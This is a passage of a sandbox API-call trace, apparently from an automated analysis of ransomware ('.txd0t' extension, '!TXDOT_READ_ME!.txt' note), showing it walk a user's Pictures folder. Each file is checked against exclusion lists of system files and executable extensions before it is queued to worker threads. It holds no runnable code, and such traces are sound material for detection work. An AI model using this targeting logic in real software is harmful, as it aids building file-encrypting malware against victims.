| out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf35bee50, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x252c0490, ftLastAccessTime.dwHighDateTime=0x1d5e968, ftLastWriteTime.dwLowDateTime=0x252c0490, ftLastWriteTime.dwHighDateTime=0x1d5e968, nFileSizeHigh=0x0, nFileSizeLow=0x14d19, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="O7DPIcWP9p.jpg", cAlternateFileName="O7DPIC~1.JPG")) returned 1 [0076.221] StrCmpW (psz1="O7DPIcWP9p.jpg", psz2=".") returned 1 [0076.221] StrCmpW (psz1="O7DPIcWP9p.jpg", psz2="..") returned 1 [0076.221] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.221] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.221] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="O7DPIcWP9p.jpg", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" [0076.221] PathFindExtensionW (pszPath="O7DPIcWP9p.jpg") returned=".jpg" [0076.221] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="bootsect.bak") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="iconcache.db") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="thumbs.db") returned -1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2=" ransomware ") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2=" ransom ") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="debug.txt") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="boot.ini") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="desktop.ini") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="autorun.inf") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="ntuser.dat") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="ntldr") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="ntdetect.com") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="bootfont.bin") returned 1 [0076.221] StrCmpIW (psz1="O7DPIcWP9p.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.221] PathFindExtensionW (pszPath="O7DPIcWP9p.jpg") returned=".jpg" [0076.221] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0076.221] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.221] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.221] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.232] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.232] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\O7DPIcWP9p.jpg" [0076.232] SetEvent (hEvent=0x410) returned 1 [0076.232] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x640e3430, ftCreationTime.dwHighDateTime=0x1d5f075, ftLastAccessTime.dwLowDateTime=0x2dd5b5e0, ftLastAccessTime.dwHighDateTime=0x1d5e581, ftLastWriteTime.dwLowDateTime=0x2dd5b5e0, ftLastWriteTime.dwHighDateTime=0x1d5e581, nFileSizeHigh=0x0, nFileSizeLow=0x13691, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="qC_RZrVpYkb.bmp", cAlternateFileName="QC_RZR~1.BMP")) returned 1 [0076.232] StrCmpW (psz1="qC_RZrVpYkb.bmp", psz2=".") returned 1 [0076.232] StrCmpW (psz1="qC_RZrVpYkb.bmp", psz2="..") returned 1 [0076.232] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.232] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.232] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="qC_RZrVpYkb.bmp", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" [0076.232] PathFindExtensionW (pszPath="qC_RZrVpYkb.bmp") returned=".bmp" [0076.232] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="bootsect.bak") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="iconcache.db") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="thumbs.db") returned -1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2=" ransomware ") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2=" ransom ") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="debug.txt") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="boot.ini") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="desktop.ini") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="autorun.inf") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="ntuser.dat") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="ntldr") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="ntdetect.com") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="bootfont.bin") returned 1 [0076.232] StrCmpIW (psz1="qC_RZrVpYkb.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.232] PathFindExtensionW (pszPath="qC_RZrVpYkb.bmp") returned=".bmp" [0076.233] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0076.233] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.233] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.233] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.241] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.241] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\qC_RZrVpYkb.bmp" [0076.241] SetEvent (hEvent=0x418) returned 1 [0076.241] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f8140, ftCreationTime.dwHighDateTime=0x1d5e23d, ftLastAccessTime.dwLowDateTime=0x5c019460, ftLastAccessTime.dwHighDateTime=0x1d5e2d0, ftLastWriteTime.dwLowDateTime=0x5c019460, ftLastWriteTime.dwHighDateTime=0x1d5e2d0, nFileSizeHigh=0x0, nFileSizeLow=0x15b62, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="QQo9Vv.bmp", cAlternateFileName="")) returned 1 [0076.241] StrCmpW (psz1="QQo9Vv.bmp", psz2=".") returned 1 [0076.242] StrCmpW (psz1="QQo9Vv.bmp", psz2="..") returned 1 [0076.242] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="QQo9Vv.bmp", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" [0076.242] PathFindExtensionW (pszPath="QQo9Vv.bmp") returned=".bmp" [0076.242] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="bootsect.bak") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="iconcache.db") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="thumbs.db") returned -1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2=" ransomware ") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2=" ransom ") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="debug.txt") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="boot.ini") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="desktop.ini") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="autorun.inf") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="ntuser.dat") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="ntldr") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="ntdetect.com") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="bootfont.bin") returned 1 [0076.242] StrCmpIW (psz1="QQo9Vv.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.242] PathFindExtensionW (pszPath="QQo9Vv.bmp") returned=".bmp" [0076.242] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0076.242] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.242] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.242] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.252] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.252] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp" [0076.252] SetEvent (hEvent=0x410) returned 1 [0076.252] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe8c1790, ftCreationTime.dwHighDateTime=0x1d5e190, ftLastAccessTime.dwLowDateTime=0x372d81b0, ftLastAccessTime.dwHighDateTime=0x1d5edf4, ftLastWriteTime.dwLowDateTime=0x372d81b0, ftLastWriteTime.dwHighDateTime=0x1d5edf4, nFileSizeHigh=0x0, nFileSizeLow=0xd506, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="VM0 JSKujUy.jpg", cAlternateFileName="VM0JSK~1.JPG")) returned 1 [0076.252] StrCmpW (psz1="VM0 JSKujUy.jpg", psz2=".") returned 1 [0076.252] StrCmpW (psz1="VM0 JSKujUy.jpg", psz2="..") returned 1 [0076.252] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.252] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.252] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="VM0 JSKujUy.jpg", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" [0076.252] PathFindExtensionW (pszPath="VM0 JSKujUy.jpg") returned=".jpg" [0076.252] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="bootsect.bak") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="iconcache.db") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="thumbs.db") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2=" ransomware ") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2=" ransom ") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="debug.txt") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="boot.ini") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="desktop.ini") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="autorun.inf") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="ntuser.dat") returned 1 [0076.252] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="ntldr") returned 1 [0076.253] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="ntdetect.com") returned 1 [0076.253] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="bootfont.bin") returned 1 [0076.253] StrCmpIW (psz1="VM0 JSKujUy.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.253] PathFindExtensionW (pszPath="VM0 JSKujUy.jpg") returned=".jpg" [0076.253] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0076.253] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.253] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.253] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.261] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.261] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg" [0076.261] SetEvent (hEvent=0x418) returned 1 [0076.261] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5f92080, ftCreationTime.dwHighDateTime=0x1d5e937, ftLastAccessTime.dwLowDateTime=0x141a96f0, ftLastAccessTime.dwHighDateTime=0x1d5e222, ftLastWriteTime.dwLowDateTime=0x141a96f0, ftLastWriteTime.dwHighDateTime=0x1d5e222, nFileSizeHigh=0x0, nFileSizeLow=0x18549, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="wAVErpzAz.png", cAlternateFileName="WAVERP~1.PNG")) returned 1 [0076.261] StrCmpW (psz1="wAVErpzAz.png", psz2=".") returned 1 [0076.262] StrCmpW (psz1="wAVErpzAz.png", psz2="..") returned 1 [0076.262] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.262] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.262] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="wAVErpzAz.png", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" [0076.262] PathFindExtensionW (pszPath="wAVErpzAz.png") returned=".png" [0076.262] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2="bootsect.bak") returned 1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2="iconcache.db") returned 1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2="thumbs.db") returned 1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2=" ransomware ") returned 1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2=" ransom ") returned 1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2="debug.txt") returned 1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2="boot.ini") returned 1 [0076.262] StrCmpIW (psz1="wAVErpzAz.png", psz2="desktop.ini") returned 1 [0076.263] StrCmpIW (psz1="wAVErpzAz.png", psz2="autorun.inf") returned 1 [0076.263] StrCmpIW (psz1="wAVErpzAz.png", psz2="ntuser.dat") returned 1 [0076.263] StrCmpIW (psz1="wAVErpzAz.png", psz2="ntldr") returned 1 [0076.263] StrCmpIW (psz1="wAVErpzAz.png", psz2="ntdetect.com") returned 1 [0076.263] StrCmpIW (psz1="wAVErpzAz.png", psz2="bootfont.bin") returned 1 [0076.263] StrCmpIW (psz1="wAVErpzAz.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.263] PathFindExtensionW (pszPath="wAVErpzAz.png") returned=".png" [0076.263] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0076.263] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.263] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.263] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.275] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.275] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png" [0076.275] SetEvent (hEvent=0x410) returned 1 [0076.275] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa578d1a0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x87e119b0, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0x87e119b0, ftLastWriteTime.dwHighDateTime=0x1d5ee48, nFileSizeHigh=0x0, nFileSizeLow=0x17b83, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="xYVA6nzw2.bmp", cAlternateFileName="XYVA6N~1.BMP")) returned 1 [0076.275] StrCmpW (psz1="xYVA6nzw2.bmp", psz2=".") returned 1 [0076.275] StrCmpW (psz1="xYVA6nzw2.bmp", psz2="..") returned 1 [0076.275] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0076.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0076.275] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="xYVA6nzw2.bmp", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" [0076.275] PathFindExtensionW (pszPath="xYVA6nzw2.bmp") returned=".bmp" [0076.275] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="bootsect.bak") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="iconcache.db") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="thumbs.db") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2=" ransomware ") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2=" ransom ") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="debug.txt") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="boot.ini") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="desktop.ini") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="autorun.inf") returned 1 [0076.275] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="ntuser.dat") returned 1 [0076.276] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="ntldr") returned 1 [0076.276] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="ntdetect.com") returned 1 [0076.276] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="bootfont.bin") returned 1 [0076.276] StrCmpIW (psz1="xYVA6nzw2.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.276] PathFindExtensionW (pszPath="xYVA6nzw2.bmp") returned=".bmp" [0076.276] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0076.276] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.276] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.276] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.276] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.276] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp" [0076.276] SetEvent (hEvent=0x418) returned 1 [0076.276] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa578d1a0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x87e119b0, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0x87e119b0, ftLastWriteTime.dwHighDateTime=0x1d5ee48, nFileSizeHigh=0x0, nFileSizeLow=0x17b83, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="xYVA6nzw2.bmp", cAlternateFileName="XYVA6N~1.BMP")) returned 0 [0076.276] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0076.276] GetProcessHeap () returned 0xe30000 [0076.276] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0076.276] FindNextFileW (in: hFindFile=0xec27f0, 